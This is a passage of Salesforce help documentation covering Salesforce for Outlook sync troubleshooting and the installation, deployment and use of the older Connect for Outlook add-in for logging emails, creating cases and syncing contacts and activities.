events, and tasks from Salesforce to Outlook, Salesforce for Outlook may create duplicate records in Outlook.

This can happen if you have Salesforce items that contain the same information as the Outlook items you either marked as
Private or assigned to the category Don’t Sync with Salesforce. These items were never mapped to each other, so
Salesforce for Outlook treats them separately, resulting in duplicates.

If you want to remove duplicates, it’s best to remove the ones in Outlook that you either marked as Private or assigned to the
Outlook category Don’t Sync with Salesforce. Doing this ensures that you don’t delete information in Salesforce to which other
users may have contributed.

See Also:
Syncing with Salesforce for Outlook

Why does Salesforce for Outlook create duplicate contacts in Salesforce
and Microsoft® Outlook®?

If you sync your team’s records and they include different information for some of the same contacts you own,
Salesforce for Outlook may create duplicate contacts in both Salesforce and Outlook.
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For example, you and a team member both have a contact for Christina Wills. But the two contacts list different companies
for her. Salesforce for Outlook syncs the contacts for you and your team members, resulting in duplicates in Salesforce and
Outlook.

To avoid this, coordinate with your team members so you share the same contact information. You’ll need to remove the
contacts containing the outdated information.

See Also:
Syncing with Salesforce for Outlook

Why does Salesforce for Outlook delete my Outlook records after I sync?
Salesforce for Outlook automatically syncs records you own, as well as records to which you have read/write access that are:

• Associated with accounts you own

• Associated with accounts of which you are an account team member

• Owned by members of your sync profile’s groups

If you try to sync a record from Outlook to Salesforce that doesn’t fit in the above categories, the sync process may attempt to
delete that record from Outlook during a later sync. To avoid deletion of these records, assign them to the Outlook category
Don’t Sync with Salesforce.

See Also:
Syncing with Salesforce for Outlook

Why isn’t Salesforce for Outlook adding emails to the right contact or
lead in Salesforce?

One of the following may be occurring.

You shouldSalesforce for Outlook may be adding
your emails to

If you have

Consider merging the duplicate recordsThe wrong recordsDuplicate records in
Salesforce for Outlook

Add the matching contacts or leads to
Salesforce and associate the unresolved
emails with your new contacts or leads

My Unresolved Items listNo matching record in
Salesforce for Outlook

See Also:
Editing Your Salesforce for Outlook Email Settings
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Why can’t I add emails to Salesforce?
If you receive the error message User is not authorized to send emails to this service when you use
Salesforce for Outlook to add emails, your email address isn’t authorized in Salesforce.

To authorize email addresses in Salesforce:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left side of the page, select Email > My Email to Salesforce.
3. In My Acceptable Email Addresses, enter the email addresses you want to authorize. Salesforce allows you to add emails

through Salesforce for Outlook from only the addresses listed in this field. You cannot leave this field empty.

See Also:
Editing Your Salesforce for Outlook Email Settings

Does Salesforce for Outlook support email attachments?
Yes. If you select the Always save email attachments checkbox in your Email to Salesforce settings, attachments are
automatically saved on emails you send to Salesforce using the Salesforce for Outlook Add Emails or Send and Add buttons
in Microsoft® Outlook®. The size limit for an attached file is 5 MB when attached directly to the related list. The size limit
for all files attached to an email is 10 MB.

See Also:
Editing Your Salesforce for Outlook Email Settings

How do I enable contacts for sync in Salesforce for Outlook?
Your administrator needs to perform the following two tasks before you can sync contacts between Microsoft® Outlook® and
Salesforce.

• Your administrator creates a configuration that allows users to sync contacts.

• Your administrator defines a data set for that configuration.

After your administrator performs those tasks, you may have permissions to enable contacts for sync by completing the following
procedure.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, click Desktop Integration > Salesforce for Outlook.
• If you clicked My Settings, click Desktop Add-Ons > Salesforce for Outlook.
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3. Click View My Configuration.
4. Under the Sync Settings section, verify you have Contacts selected. If you're unable to select it, contact your administrator,

who can enable contact syncing for you.

See Also:
Editing Your Salesforce for Outlook Sync Settings
Syncing Contacts with Salesforce for Outlook
Learning about Data Sets for Salesforce for Outlook

How does Salesforce for Outlook protect emails?
Salesforce.com supports both delegated authentication and Security Assertion Markup Language (SAML) requirements for
Salesforce for Outlook. When using SAML for Salesforce for Outlook, My Domain is required.

See Also:
Editing Your Salesforce for Outlook Email Settings

Does salesforce.com support single sign-on (SSO) for
Salesforce for Outlook?

Yes. Salesforce.com supports both delegated authentication and Security Assertion Markup Language (SAML) requirements
for Salesforce for Outlook. When using delegated authentication, users need to log into Salesforce the first time they use
Salesforce for Outlook. When using SAML for Salesforce for Outlook, My Domain is required.

What security does Salesforce for Outlook use for usernames and
passwords?

Salesforce for Outlook uses OAuth 2.0 to authenticate with Salesforce. We store usernames and encrypted OAuth refresh
tokens locally. We never store passwords.
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SYNCING SALESFORCE AND MICROSOFT® OUTLOOK® 2007
AND EARLIER

Force.com Connect for Microsoft Outlook Overview
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Force.com Connect for Microsoft Outlook is an add-in that lets you interact with Salesforce conveniently from Microsoft®

Outlook®. Connect for Outlook adds buttons and options to your Outlook user interface.

Note:  For the latest Outlook integration experience, upgrade to Salesforce for Outlook.

With Connect for Outlook, you can:

• Use the Salesforce Address Book to insert contacts and leads as email recipients

• Add outbound or existing email messages from Outlook to account, asset, campaign, case, contact, contract, lead, opportunity,
product, and custom object records in Salesforce

• Upload email attachments to Salesforce

• Create a new case in Salesforce from an Outlook email

• Associate contacts, calendar events, and tasks in Outlook with records in Salesforce

• Synchronize contacts, calendar events, and tasks between Salesforce and Outlook

• From Outlook, open a Salesforce record's detail page in a Web browser

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Installing Connect for Outlook
Using Connect for Outlook
Setting Connect for Outlook Options
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Installing Connect for Outlook
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

1. Back up your Microsoft® Outlook data, saving each of your folders as a .pst file using File > Import and Export > Export
to a File > Personal Folder File (.pst).

2. Back up your Salesforce data. We recommend you run reports of your contacts and activities and then export them to
Excel. Alternatively, users with Enterprise or Unlimited Editions can ask their Salesforce administrator to back up their
organization’s data using weekly export.

3. Uninstall any previous versions of Connect for Outlook, which appear in the program removal tool of your Microsoft
Windows® Control Panel as “Salesforce Outlook Edition”.

4. Exit Outlook, making sure to close all Outlook windows.
5. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup

or My Settings—whichever one appears.
6. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Salesforce for Outlook > Connect for Microsoft Outlook.
• If you clicked My Settings, select Desktop Add-Ons > Salesforce for Outlook > Connect for Microsoft Outlook.

If you can’t see the download page, ask your administrator for access.

7. Click Install Now.

The Connect for Outlook download page also includes a link to download an .msi file so system administrators can
centrally deploy Connect for Outlook to their entire organization.

8. Run the installer, following the prompts on each screen.
9. Start Outlook. A wizard introduces you to features and options. To change your Connect for Outlook options later, use

the Configuration Options dialog box.
10. After completing the wizard, restart Outlook to apply your changes.

Note: Connect for Outlook requires Salesforce to install components that edit the registry on your computer. If your
organization imposes security that prevents you from editing the registry, log in as the administrator of your machine
before installing these components or contact your IT department for assistance.

Logging in to Connect for Outlook

If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated. Salesforce automatically
sends you an activation email that you can use to log in. The email contains a security token that you must add to the end of
your password. For example, if your password is mypassword, and your security token is XXXXXXXXXX, you must enter
mypasswordXXXXXXXXXX to log in.

See Also:
Connect for Outlook System Requirements
Deploying Connect for Outlook System-Wide
Setting Connect for Outlook Options
Using Connect for Outlook
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Connect for Outlook System Requirements
The system requirements for Connect for Outlook are:

• Microsoft® Outlook® 2002, 2003, or 2007

• Microsoft Windows® 2000, Windows XP, Windows Vista®, or Windows 7 (32-bit only)

• Microsoft Exchange Server

• Microsoft Word 2002, 2003, or 2007

Implementation Considerations

• You must have administrator permissions to run the .msi installer with Windows 7.

• Connect for Outlook is available in all supported languages offered by Salesforce. However, your Connect for Outlook
language is determined by your Outlook display language setting rather than your Salesforce language.

• To display non-English characters in Connect for Outlook, you must install the Windows language service packs
for the characters you want to display or add the specified language to the mail format settings within Outlook.

• Connect for Outlook fully supports Unicode encoding. However, versions of Outlook prior to Outlook 2003 do not.
If you use an earlier version of Outlook, synchronized items may not display properly in Salesforce if they contain
characters that are not native to your Outlook locale.

See Also:
Force.com Connect for Microsoft Outlook Overview
Installing Connect for Outlook

Deploying Connect for Outlook System-Wide

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

As an administrator, you can enforce data quality by controlling what users can do in regards to the movement of their data
when synchronizing contacts, tasks, and calendar events with Connect for Outlook. Follow these steps:

1. Start an Outlook client that has the Connect for Outlook add-in installed.
2. In Outlook, go to Tools > Salesforce Options.
3. In the Contacts, Events, and Tasks tabs, set the following fields as desired:

• Synchronize Data with Salesforce - Select this checkbox to allow users to synchronize that type of record.
If you deselect it, all Connect for Outlook features related to synchronization will be hidden from your users.

• Data Movement - Can be Export to Salesforce, Export with Overwrites to Salesforce, Import
from Salesforce, Import with Overwrites from Salesforce, or Synchronize with Salesforce.
These options determine how data moves between Salesforce and Connect for Outlook during synchronization.

• Always mark for sync - Select this checkbox to automatically select the Mark for Sync option on all newly
created items of the appropriate type that you save to your synchronization folder. For example, if you set this option
for contacts, any newly created contacts that you save to the synchronization folder are automatically included the next
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time you sync with Salesforce. You can exclude an automatically-marked item from synchronization if you manually
unmark it.

Note: Records created or edited on the server or on other devices, such as a Blackberry, won't be marked for
sync.

• Click Advanced > Conflict and choose one of the following radio buttons: Ignore all conflicts, Notify me
when conflicts occur, Salesforce always wins, or Outlook always wins. These advanced options
determine how Connect for Outlook handles conflicts between Salesforce and Outlook data during synchronization.

4. Click the User Permissions tab. For reference, the Synchronization Settings area summarizes the settings you made in the
previous step.

5. In the User Permissions area, select or deselect the following settings:

• User can modify which objects are synchronized

• User can modify field mappings

• User can modify conflict resolution options

• User can modify the direction of synchronizations

• User can quick create

This setting enables the Quick Create links for accounts, contacts, and leads on the Add to Salesforce and Change
Associations dialog boxes.

6. Click the Show File button to open the settings file O_Dictionary.xml. If necessary, change the XOverrideOptions
attribute to OverrideOptions and change the OverrideOptions value to “true.” Save and close the file.

7. If you have not already prohibited user access to program files, do so now. At a minimum, deny write access to C:\Program
Files\salesforce.com.

8. Using a tool such as Microsoft Systems Management Server (SMS), distribute the XML file to your users in the following
directory: C:\Program Files\salesforce.com\O3.

Note:  For Windows 2000 and XP users, note that this dictionary file takes precedence over the user-specific file
with the same name at C:\Documents and Settings\<user name>\Application
Data\salesforce.com\SM. For Windows Vista users, the user-specific file is located at C:\Users\<user
name>\AppData\Roaming\salesforce.com\SM.

9. When they start Connect for Outlook, users will only be able to perform the operations that you have enabled and will
not have access to the User Permissions tab in the options dialog box.

For information on using registry keys to customize Connect for Outlook for your users, see the Administering Connect for
Outlook tip sheet.

See Also:
Installing Connect for Outlook
Setting Connect for Outlook Options
Tip sheet: Administering Connect for Outlook
Installing Connect for Outlook
Setting Connect for Outlook Options
Tip sheet: Administering Connect for Outlook
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Using Connect for Outlook
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Connect for Outlook is easy to use—most actions take only a few clicks to perform. Connect for Outlook commands are
conveniently located in toolbars, right-click shortcut menus, and the Ribbon (if you have Outlook 2007).

Working with Outlook Email Messages

• Adding Contacts and Leads as Email Recipients with Connect for Outlook
• Adding Outgoing Emails to Salesforce with Connect for Outlook
• Adding Sent or Received Email Messages to Salesforce with Connect for Outlook
• Creating Cases from Outlook Emails with Connect for Outlook

Working with Outlook Contacts, Calendar Events, and Tasks

• Assigning Outlook Items to Salesforce Records
• Synchronizing Your Contacts and Activities with Connect for Outlook
• Opening Salesforce Records from Outlook with Salesforce

Working with Person Accounts

• Working with Person Accounts in Connect for Outlook

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Setting Connect for Outlook Options
Setting Your Sync Profile for Connect for Outlook
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Adding Contacts and Leads as Email Recipients with
Connect for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

When sending an email from Outlook using Connect for Outlook, you can use the Salesforce Address Book to add contacts
and leads as recipients of outgoing emails.

1. Open Outlook.
2. Click New to compose a new email.
3. In Outlook XP and 2003, click the Salesforce Address Book button in the toolbar. In Outlook 2007, click the Salesforce

tab on the Ribbon, then choose Salesforce Address Book.
4. In the search box, enter all or part of the Email, First Name, Last Name, Phone, Lead, Company, custom email or

phone number field, or any other field accessible in search for contacts and leads.

For example, enter ma, madison, rigsby, or madison rigsby to find Madison Rigsby. Your search term must
have a minimum of two characters.

5. Click Search.
6. Select names from the matching contacts and leads.
7. Click the To, Cc, or Bcc button to add the names as email recipients.
8. Click OK to finish.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.
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Adding Outgoing Emails to Salesforce with Connect for
Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on each type of recordTo associate Outlook items with Salesforce records:

Connect for Outlook enables you to send email messages from Outlook and quickly log them as tasks in Salesforce. For
example, if you send an email requesting feedback about an opportunity, you can save the email as a task assigned to you in
Salesforce. The email is added to Salesforce as a completed task in the Activity History related list of the associated records.
Follow these procedures in order:

Beginning an Outgoing Email

Begin by starting the email that you want to add to Salesforce as a task:

1. In Outlook, open an email folder.
2. Click New to compose a new email.
3. Optionally, use the Salesforce Address Book to add contacts and leads as recipients of the email.
4. Compose the email message.
5. In Outlook XP and Outlook 2003, click the Send and Add button in the toolbar. In Outlook 2007, click the Salesforce

tab on the Ribbon, then choose Send and Add. The Add to Salesforce dialog box opens.

Note:  If you have multiple IMAP or POP3 email accounts configured in Outlook, Connect for Outlook always
uses your default IMAP or POP3 email account as the email sender when you click Add to Salesforce, no matter
which email account you are currently using in Outlook.

Associating an Email

Next, associate the Outlook email with one or more Salesforce records using the Add to Salesforce dialog box.

Note: Certain tabs or fields on the Add to Salesforce dialog box may be unavailable if your administrator has hidden
the Name or Related To fields for tasks in Salesforce.

1. On the Names tab:

a. Confirm that the task has the correct assignee, status, and subject.
b. In the Results box, double-click the correct contact or lead to associate with the task. Your selection displays at the

bottom of the tab. You can click the View link to open the contact or lead in Salesforce or click the Clear link to make
another selection. Note that when you select a lead, you cannot associate the email with another Salesforce record. If
needed, enter criteria in the Search field and click Go!

c. If you do not find the contact or lead you want, you can create a new one by clicking the Quick Create Contact or
Lead links, if enabled.

2. On the Related To tab:
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a. Optionally, search for another record such as an account or opportunity to associate with the task. Double-click the
correct record in the Results box. Your selection displays at the bottom of the tab.

b. If you do not find the account you want, you can create a new account by clicking the Quick Create Account link, if
enabled.

Choosing Attachments for Upload

Optionally, upload Outlook email attachments to Salesforce records using the Add to Salesforce dialog box.

Note:  You won't see the Attachments tab if your administrator has hidden the Name and Related To fields for tasks
in Salesforce.

1. On the Attachments tab, select a radio button to specify the record where the attachment will be uploaded. You can only
choose one record.

2. In the Email Attachments box, select the checkboxes next to the attachments you want to upload.
3. In the Files from My Computer box, click Add... to browse for files on your local computer to upload.

Links to the uploaded attachments will be included in the Comments area of the new task.

Editing Uploaded Text

On the Message tab in the Add to Salesforce dialog box, you can edit the message contents that will be added to Salesforce.
Any changes you make only affect the newly-created task in Salesforce, not the stored email in Outlook.

Adding the Email to Salesforce

Finally, click Add to Salesforce in the Add to Salesforce dialog box to add the email as a completed task in the Activity History
related list of the associated records. The Type field on the new task is automatically set to “Email.”

If the Show item after adding email checkbox is selected on the Email tab of your Salesforce Options dialog box,
then the new task automatically opens in your Web browser.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Adding Sent or Received Email Messages to Salesforce with Connect for Outlook
Creating Cases from Outlook Emails with Connect for Outlook
Tips for Assigning Outlook Emails to Salesforce Records with Connect for Outlook
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Adding Sent or Received Email Messages to Salesforce
with Connect for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on each type of recordTo associate Outlook items with Salesforce records:

Connect for Outlook lets you add email messages that you have sent or received as tasks in Salesforce. For example, if you
receive an email from a customer requesting an invoice, you can save the email as a task that is assigned to you in Salesforce.
Follow these procedures in order:

Selecting Sent or Received Email Messages

First, select existing email messages that you want to add to Salesforce as tasks:

1. In Outlook, open an email folder.
2. Select one or more email messages so they are highlighted.
3. Click Add Email from the toolbar or the right-click shortcut menu. The Add to Salesforce.com dialog box opens.

Associating an Email

Next, associate the Outlook email with one or more Salesforce records using the Add to Salesforce dialog box.

Note: Certain tabs or fields on the Add to Salesforce dialog box may be unavailable if your administrator has hidden
the Name or Related To fields for tasks in Salesforce.

1. On the Names tab:

a. Confirm that the task has the correct assignee, status, and subject.
b. In the Results box, double-click the correct contact or lead to associate with the task. Your selection displays at the

bottom of the tab. You can click the View link to open the contact or lead in Salesforce or click the Clear link to make
another selection. Note that when you select a lead, you cannot associate the email with another Salesforce record. If
needed, enter criteria in the Search field and click Go!

c. If you do not find the contact or lead you want, you can create a new one by clicking the Quick Create Contact or
Lead links, if enabled.

2. On the Related To tab:

a. Optionally, search for another record such as an account or opportunity to associate with the task. Double-click the
correct record in the Results box. Your selection displays at the bottom of the tab.

b. If you do not find the account you want, you can create a new account by clicking the Quick Create Account link, if
enabled.

Choosing Attachments for Upload

Optionally, upload Outlook email attachments to Salesforce records using the Add to Salesforce dialog box.
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Note:  You won't see the Attachments tab if your administrator has hidden the Name and Related To fields for tasks
in Salesforce.

1. On the Attachments tab, select a radio button to specify the record where the attachment will be uploaded. You can only
choose one record.

2. In the Email Attachments box, select the checkboxes next to the attachments you want to upload.
3. In the Files from My Computer box, click Add... to browse for files on your local computer to upload.

Links to the uploaded attachments will be included in the Comments area of the new task.

Editing Uploaded Text

On the Message tab in the Add to Salesforce dialog box, you can edit the message contents that will be added to Salesforce.
Any changes you make only affect the newly-created task in Salesforce, not the stored email in Outlook.

Adding the Email to Salesforce

Finally, click Add to Salesforce in the Add to Salesforce dialog box to add the email as a completed task in the Activity History
related list of the associated records. The Type field on the new task is automatically set to “Email.”

If the Show item after adding email checkbox is selected on the Email tab of your Salesforce Options dialog box,
then the new task automatically opens in your Web browser.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Adding Outgoing Emails to Salesforce with Connect for Outlook
Creating Cases from Outlook Emails with Connect for Outlook
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Tips for Assigning Outlook Emails to Salesforce Records
with Connect for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on each type of recordTo associate Outlook items with Salesforce records:

You can associate Outlook email messages with account, asset, campaign, case, contact, contract, lead, opportunity, product,
and custom object records in Salesforce. These tips apply to the Add to Salesforce dialog box in Connect for Outlook.

Search Tips

• If enabled, the Names tab in the Add to Salesforce dialog box of Connect for Outlook can automatically search for contacts
and leads whose email addresses match an address in the To, Cc, Bcc, or From fields of the Outlook email.

• You can perform searches for any field supported in Salesforce search. In addition, you can search for products.
• You must enter at least two characters before clicking Go! to run a search.
• When searching for records, you can use Boolean operators such as AND and OR.
• In the Search Options box on the Related To tab, you can choose which types of records to search for. To search across

all possible types of records, select the checkbox in the header row. However, products must be searched for alone.
• If the search results return multiple matches and you are not sure which to select, click the View link to open that record

in a Web browser.

Association Tips

• When associating an email to a contact in the Add to Salesforce dialog box of Connect for Outlook, you can choose one
other related record; for a lead, you cannot associate another related record.

• On the Related To tab, you can search for accounts, assets, campaigns, cases, contracts, custom objects, opportunities, and
products to associate with the new task.

• To make a custom object available for association, your Salesforce administrator must select Allow Activities and
Deployed on the custom object definition.

• On the Related To tab, the record you select does not need to have a relationship to your chosen contact on the Names
tab.

• You can associate a new contact with an existing account by performing an account lookup when you create the new contact
record.

• Certain tabs or fields on the Add to Salesforce dialog box may be unavailable if your administrator has hidden the Contact
Name field for cases or the Name and Related To fields for tasks in Salesforce.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.
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Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Creating Cases from Outlook Emails with Connect for Outlook

Looking up Salesforce Accounts with Connect for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

When you create a new contact in Outlook, you can populate the Company field with an existing Salesforce account name.

1. In Outlook, open your Contacts folder.
2. Click New to create a new contact.
3. Click the Lookup Account button.
4. Enter a search term, and click Go. Keep these tips in mind when searching for accounts:

• You can search for information in any standard or custom field of type text, text area, long text area, email, or phone.
• The wildcard character is the asterisk (*). For example, to search for all accounts that begin with Acme, type Acme* into

the search box.
• To search for all accounts, use only the wildcard character as your search term.
• Searches are not case-sensitive. Searching for ibm is the same as searching for IBM.
• Special operators such as double quotation marks are not supported.

5. Double-click an account name in the list to associate it with the contact.

Assigning Outlook Items to Salesforce Records with
Connect for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on each type of recordTo associate Outlook items with Salesforce records:

From Outlook, you can associate existing contacts, calendar events, and tasks with records in Salesforce.

1. In Outlook, select one or more items so they are highlighted. Alternatively, open an individual item in its own window.
2. Select Change Associations from the toolbar or the right-click shortcut menu. In Outlook 2007, if the item is open in its

own window, click the Salesforce tab on the Ribbon, and then choose Change Associations. The Change Associations
dialog box opens.
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3. If you are associating contacts and the Company or Manager’s Name fields are populated for at least one of the selected
contacts, you must select the associated Account and Reports To records in Salesforce.

If you are associating a calendar event or task, click the Search Salesforce drop-down list in the Contacts/Leads or Other
Records tab and select the correct object type.

Note:  If you select Leads on the Contacts/Leads tab, the Other Records tab disappears. This is because leads are
considered prospects that have no associated records. To associate to other records, first select Contacts from the
drop-down list, and then click the Other Records tab.

4. Double-click the correct item in the search results to select an existing record to associate.

Optionally, click View in Salesforce to open that item’s record in your Web browser.

If you do not find the Salesforce record you want, you can create a new account, contact, or lead by clicking the appropriate
Quick Create button. The Outlook item is associated with this new Salesforce object after the next sync.

5. Click OK to save your work.

Note:  Associations are not propagated to Salesforce until a synchronization has been performed. You can set
items to be automatically marked for synchronization when you set up configuration options.

Viewing Outlook Item Associations

Connect for Outlook offers dynamic buttons that display the names of associated Salesforce records. In Outlook XP and
Outlook 2003, the name of each associated record displays as a button in the Connect for Outlook toolbar. In Outlook 2007,
you can see the associated records in the Salesforce tab on the Ribbon.

As you select different Outlook items, the buttons change automatically to reflect each item’s associations. Click a button to
open that record in your Web browser.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Using Connect for Outlook
Synchronizing Your Contacts and Activities with Connect for Outlook
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Creating Cases from Outlook Emails with Connect for
Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

You can create a case in Salesforce using the contents of an email that you have sent or received in Outlook. For example, if
you receive an email reporting a problem that you want to track in Salesforce, you can log the email as a Salesforce case that
will be assigned to you. Certain tabs or fields on the Add to Salesforce dialog box may be unavailable if your administrator
has hidden the Contact Name field for cases or the Name and Related To fields for tasks in Salesforce.

1. In Outlook, open an email folder.
2. Select a sent or received email message so it is highlighted.
3. Click Add Case from the toolbar or the right-click shortcut menu.
4. On the Names tab:

a. Confirm that the case has the correct case owner, status, and subject.
b. If you want to automatically assign a case owner, select Use assignment rules to select case owner. The

Case Owner field indicates that the owner will be assigned automatically, and the Change and View links are disabled.
You can see the case owner that is automatically assigned when you view this case in Salesforce.

c. In the Results box, double-click the correct contact to associate with the case. Your selection displays at the bottom of
the tab. You can click the View link to open the contact in Salesforce or click the Clear link to make another selection.
If needed, enter criteria in the Search field and click Go!

d. If you do not find the contact you want, you can create a new one by clicking the Quick Create Contact link, if enabled.

5. On the Attachments tab:

a. Select the Yes radio button to upload an attachment to the new case.
b. In the Email Attachments box, select the checkboxes next to the attachments you want to upload.
c. In the Files from My Computer box, click Add... to browse for files on your local computer to upload.

6. On the Message tab, edit the message contents that will be added to Salesforce. Any changes you make only affect the
newly created case in Salesforce, not the stored email in Outlook.

7. When you are ready to create a new case from the Outlook email, click the Add to Salesforce button in the dialog box.

If the Show item after creating a case checkbox is selected on the Email tab of your Salesforce Options dialog
box, then the new case automatically opens in your Web browser.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.
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Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Adding Outgoing Emails to Salesforce with Connect for Outlook

Synchronizing Your Contacts and Activities with Connect
for Outlook

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

With Connect for Outlook, you can synchronize your contacts, tasks, and calendar events between Salesforce and Outlook.
This allows updates to records in Outlook and Salesforce to remain in sync. Before you can synchronize to Salesforce, you
must save items to your sync folder by marking them for synchronization.

To set items that you have saved to your synchronization folder to be automatically marked for sync:

1. Navigate to Tools > Salesforce Options.
2. Select the Contacts, Events, or Tasks tab.
3. Select the Always mark records for sync checkbox.

Note: Records created or edited on the server or on other devices, such as a Blackberry, won't be marked for sync.

If you want to synchronize contacts owned by other users, set your sync profile before synchronizing.

To manually synchronize information:

1. In Outlook, select one or more contacts, calendar events, or tasks. Note that you cannot synchronize emails, but you can
add them as tasks or cases in Salesforce.

2. Select Mark for Sync from the toolbar or the right-click shortcut menu. This adds the items to the “salesforce.com” category
in Outlook. In Outlook 2007, if the item is open in its own window, click the Salesforce tab on the Ribbon, then choose
Save and Mark for Sync.

If the Company or Manager's Name fields are populated for one of the selected contacts, you must select the associated
Account and Reports To records in Salesforce. If you select multiple items that have been automatically marked for sync,
you can now complete associations for these items as needed.

In Outlook, when you open your contacts in an address card view, colored icons indicate a contact's synchronization status.
When a contact is first marked for synchronization, an icon with a red clock dial displays next to the contact's name. After
synchronization, a green check mark icon displays next to the contact's name. For contacts that were manually added to
the “salesforce.com” category, a status icon does not display until after the contact has been synchronized.

Tip:  While creating or editing an Outlook item, you can quickly mark it for synchronization by clicking Save
and Mark for Sync.
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3. Click Sync in the Connect for Outlook toolbar. Connect for Outlook begins synchronizing all marked items with Salesforce.
Your very first synchronization may take several minutes because your data is comparison-checked in order to avoid
duplicates.

Note:  During synchronization, the Outlook Reading Pane does not automatically refresh as you highlight messages
in your email folders. To view messages during synchronization, double-click the message to open it in a separate
window.

Also, during synchronization, Connect for Outlook commands in the right-click shortcut menu are not available.

To avoid unnecessary space usage, not all occurrences of recurring appointments synchronize between Salesforce
and Outlook. The following occurrences synchronize according to your computer's current time and date:

• Occurrences of a daily series that fall approximately in the next thirty days
• Occurrences of a weekly series that fall approximately in the next six weeks
• Occurrences of a monthly or yearly series that fall approximately in the next six months

4. If records will be added to Outlook or Salesforce as a result of the synchronization, a dialog box summarizes these changes
and asks you to confirm them.

5. If necessary, you are prompted to resolve data conflicts.
6. When the synchronization process completes, click OK.

Note: If you further want to synchronize your Outlook data with a Palm handheld or other device, consult the
documentation for your device.

To specify that you no longer want to synchronize an item, select one or more items and click Unmark for Sync in the Connect
for Outlook toolbar, or right-click and choose Unmark for Sync from the right-click shortcut menu. In Outlook, the
“salesforce.com” category is removed from the item.

Connect for Outlook contains various synchronization options you can customize, including scheduling synchronization,
specifying the synchronization direction, determining how conflicts should be handled by default, and specifying the field
mappings for synchronization.

Setting Up Associations for Outlook Items

You can associate contacts, calendar events, and tasks with Salesforce records. For example, you can associate an Outlook
